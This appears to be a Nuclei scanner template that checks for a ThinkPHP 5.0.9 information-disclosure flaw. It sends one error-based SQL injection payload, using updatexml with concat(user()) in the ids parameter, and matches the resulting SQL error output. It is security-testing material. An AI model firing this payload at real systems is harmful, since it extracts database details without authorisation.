id: thinkphp-509-information-disclosure

info:
  name: ThinkPHP 5.0.9 - Information Disclosure
  author: dr_set
  severity: critical
  description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
  metadata:
    max-request: 1
  tags: thinkphp,vulhub,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQLSTATE"
          - "XPATH syntax error"
        condition: and

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100c926cc967c9e286295e4d63b923e18cacd151bdd2dd98c9174cf397f9687fbbf022100cb5fd1f9f0794ca0be57f1fd0a65259597dc24900c7354d781377c927a957e52:922c64590222798bb761d5b6d8e72950